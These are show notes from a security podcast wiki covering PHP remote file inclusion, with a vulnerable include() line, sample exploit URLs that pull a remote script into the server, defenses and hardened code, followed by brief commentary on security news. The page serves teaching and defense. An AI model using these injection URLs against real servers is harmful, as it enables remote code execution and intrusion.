Episode54

From Paul's Security Weekly
Revision as of 16:54, 14 March 2008 by Steven.mcgrath


Exploit Of The Week: PHP Remote File Includes

We all know about some of the more traditional vulnerabilities, such as stack-based buffer overflows, integer overflows, format string attacks, cross-site scripting, and more. However, remote file inclusion vulnerabilities are slightly different, and becoming very popular. The article Remote file inclusion vulnerabilities by Jake Edge does a good job of explaining:

"An attacker's fondest wish is to be able to run their code on the target system; an RFI exploit does just that. By exploiting two very dubious 'features' of the PHP language, an attacker can inject their code into a PHP program on the server. Once they can do that, they can access anything that the PHP program could: databases, password files, etc. They can install their own shell running with the privileges of the web server user (such as 'apache' or 'httpd') and if the server has not been patched for some local user privilege escalation vulnerability, the shell could be used to become the root user."

Example Vulnerability:

include($base_path . "/foo.php");

Example Exploit:

http://vulnerable.com/RFI.php?base_path=http://example.com/badcode?foo=

MilW0rm Example:

Link: http://www.milw0rm.com/exploits/2894

Software: Phorum v3.2.11

Vendor: http://www.phorum.org/

Example Vulnerability:

$db_file = './db/postgresql65.php';

Example Exploit:

http://[localhost]/[paTh]/common.php?db_file=[Ev!lScript]

Defenses:

- Set register_globals to OFF (http://us2.php.net/register_globals)

- Enable safe_mode (http://www.php.net/features.safe-mode)

- Configure disable_functions to disallow the 'system' and 'exec' functions (this would have prevented the attackers from running arbitrary commands).
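One way to close the hole the segment describes, shown as an added example that is not the show's or Phorum's own code (the allow-list map and the db query parameter are assumptions for illustration):

```php
<?php
// Added example, not code from the show notes or from Phorum: the include
// pattern discussed above, first as the page shows it and then hardened so
// that request data can only select from a fixed map of local files.
// Variable names follow the page; the map contents are assumed.

// Vulnerable form (as on the page): with register_globals=On a request such as
// ?base_path=http://example.com/badcode?foo= sets $base_path, and include()
// fetches and executes the remote script with the web server's privileges.
//
//     include($base_path . "/foo.php");

// Hardened form: the request supplies a key, never a path or a URL.
$db_files = [
    'mysql'      => __DIR__ . '/db/mysql.php',
    'postgresql' => __DIR__ . '/db/postgresql65.php',   // the page's default
];

function resolve_db_file(array $allowed, ?string $requested, string $default): string
{
    // Exact key match only: URLs, '../' sequences, null bytes or anything
    // else not present in the map fall through to the default file.
    if ($requested !== null && array_key_exists($requested, $allowed)) {
        return $allowed[$requested];
    }
    return $allowed[$default];
}

// Accept only a plain string; ?db[]=x and a missing parameter both become null.
$requested = (isset($_GET['db']) && is_string($_GET['db'])) ? $_GET['db'] : null;
$db_file   = resolve_db_file($db_files, $requested, 'postgresql');
require $db_file;

// Matching php.ini settings. register_globals and disable_functions are the
// page's Defenses; allow_url_include (PHP 5.2+) is added here and blocks URL
// includes outright even if a path does reach include():
//   register_globals  = Off
//   allow_url_include = Off
//   disable_functions = system,exec,shell_exec,passthru
```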

Further Reading:

http://www.securityfocus.com/infocus/1864

http://www.sans.org/top20/#c1

Tech Talk with Larry: Windows Authentication with RFID

RFIDToys - To download the software for the book projects, you need to register for the forums.

Extremetech article - on windows authentication with RFID.

RFID Firewall - something that I'll be looking at later.

Stories For Discussion

YAIEV For IE 6 and 7 - [PaulDotCom] - This one is labeled as content retrieval, Secunia says: "This actually means that if you were logged into your bank account, any web site you are visiting would be able to retrieve confidential data from your bank. This could also be used to retrieve personal settings entered on sites like eBay or Paypal." Of course there is no patch for this vulnerability....

Snort Inline (and other features) Article - [PaulDotCom] - Snort continues to evolve and become one of the most important tools in your defense arsenal. This article shows you how to use it for an IPS, anti-virus gateway, and performance monitor! Cool stuff.

Bizarre and Funny Wireless Posting - [PaulDotCom] - Wifi interfering with electricity? "I think there is hacker living on my street anyway...." Oh no! A hacker! There goes the neighborhood...

Security People Use Firefox - [PaulDotCom] - So should you :)

Windows Cmd Line Foo From Ed Skoudis - [PaulDotCom] - Some really cool tips on using netstat in windows in new and interesting ways. [Larry] - Ed's command line fu is totally amazing.

Zero Day Vulnerability Tracker - [PaulDotCom] - Don't get me wrong, I think this is a valuable service, however, is Microsoft the only vendor out there with 0days? [Larry] - I'm sure we'll see this populated with all sorts of nasties - Like Oracle 0-days!

MySpace + Quicktime + Apple = Disaster - [PaulDotCom] - What a mess, who is Tom? Is that like a peeping Tom? Wouldn't surprise me on MySpace, however, this is the totally wrong way to distribute patches. I agree with Krebs, MySpace should disable Quicktime until they get a fix. Of course that breaks like *everyone's* MySpace page.... [Larry] - EVERY person (except for me) in my CIS 102 class was on MySpace last night. I was just waiting for Quicktime.

Incident Handling On Your Cell Phone - [PaulDotCom] - Funny posting from Tom Liston, and an example of really bad Malware coding.

Open Letter to Domain Registrars - [PaulDotCom] - When are we going to have common sense applied to domain registration? Should eBay be buying these domains? Should people be prevented from registering them? [Larry] - this is a really sticky situation that the registrars could be in for many reasons.

Shmoocon! - [Larry] - The PDC crew have their tickets, do you?

IBM Tivoli remote overflow/DoS - [Larry] - We stress good backups all the time, and well, Tivoli server handles all of your backups. Honestly, if I wanted to cause damage to someone's computing abilities, I'd damage the backups, and THEN go after the rest.

Belkin Wireless USB hub - [Larry] - We got asked about this not too long ago, but looks like we can soon have wireless USB from 30 feet. Yet another wireless technology to be aware of, audit, protect, etc. Some analysis of these devices might make for a kick-butt GAWN paper.

Chinese Hackers take out Naval War College - [Larry] - Right in our own back yard. Isn't this where Stephen Northcutt used to work, or was that Richard Bejtlich? Either way, they are still offline almost a week later, and no idea when they are coming back.

New version of Cain and Abel - [Larry] - a great tool, especially for capturing VoIP traffic. I wonder if it is possible via wireless with AirPcap?

One secure USB drive - [Larry] - Encryption, biometrics, and a combination lock. What's next? "This item will self destruct..."

FreeRADIUS Vulnerabilities - [Larry] - On the top of my mind, as we were looking at some RADIUS solutions for a project...

Month Of Novell Bugs? - [PaulDotCom] - There have been a long string of vulnerabilities found in Novell products in the past month or so, here's a breakdown:

- Novell Client Remote Exploit
- ZENworks SQL Injection
- Novell Client DoS
- Novell ZENworks Heap Overflow
- Novell iManager DoS
- Novell eDirectory DoS

Intel LAN driver privilege escalation - [Larry] - from wireless to wired. Sure, not as "dangerous" but just you wait. I bet this is just the next step in driver fuzzing.

Adobe Vulnerability Watch - [PaulDotCom] - I always try to keep a close watch on the vulnerabilities in Adobe Reader and the like, as most users install this app by default when they build a system, therefore making it a big target for attackers. [Adobe Reader Vulnerability Uncovered recently http://www.kb.cert.org/vuls/id/198908].

Mobile Malware - [Larry] - Uh oh, it is on!

Other Stories Of Interest

Start Global Thermonuclear War On Your PC! - [PaulDotCom] - Very cool game and screenshots, and for only $17!